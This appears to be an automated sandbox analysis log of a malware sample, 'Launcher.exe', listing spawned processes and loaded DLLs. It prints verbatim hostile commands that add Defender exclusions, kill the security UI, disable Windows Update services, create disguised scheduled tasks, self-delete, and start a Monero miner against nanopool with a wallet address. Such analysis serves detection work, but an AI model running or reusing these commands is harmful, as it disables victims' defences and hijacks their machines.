                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exe
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeProcess created: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe "C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe"
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe C:\Users\user\AppData\Local\wxymrnibweqciwn.exe
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist"
                      Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Get-WmiObject Win32_PortConnector"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C timeout 5 && del "C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 5
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 5 /nobreak >nul & del "C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe"
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 /nobreak
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 472 -p 6972 -ip 6972
                      Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6972 -s 136
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2
                      Source: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector""Jump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "net session"Jump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe C:\Users\user\AppData\Local\wxymrnibweqciwn.exeJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net sessionJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 sessionJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeProcess created: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe "C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe"
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist"
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Get-WmiObject Win32_PortConnector"
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C timeout 5 && del "C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe"
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }"
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 5 /nobreak >nul & del "C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 /nobreak
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 472 -p 6972 -ip 6972
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6972 -s 136
                      Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
